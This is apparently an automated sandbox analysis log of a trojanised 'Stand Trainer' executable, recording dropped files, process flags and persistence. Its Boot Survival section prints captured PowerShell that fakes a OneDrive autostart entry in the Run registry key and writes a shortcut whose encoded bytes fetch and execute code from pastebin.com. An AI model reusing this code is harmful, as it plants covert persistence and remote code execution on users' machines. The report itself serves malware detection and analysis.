Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC70A81D pushad ; ret 1_2_00007FFAAC70A841
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFAAC6650AD push E95633B4h; ret 6_2_00007FFAAC6650F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC6774EB push ebx; iretd 12_2_00007FFAAC67756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC67757B push ebx; iretd 12_2_00007FFAAC67756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC66EEA7 push ebp; ret 12_2_00007FFAAC66EEA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC67782E pushad ; iretd 12_2_00007FFAAC67785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC67785E push eax; iretd 12_2_00007FFAAC67786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC6600BD pushad ; iretd 12_2_00007FFAAC6600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC736DC3 push edi; iretd 12_2_00007FFAAC736DC6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Backend.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeJump to dropped file

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
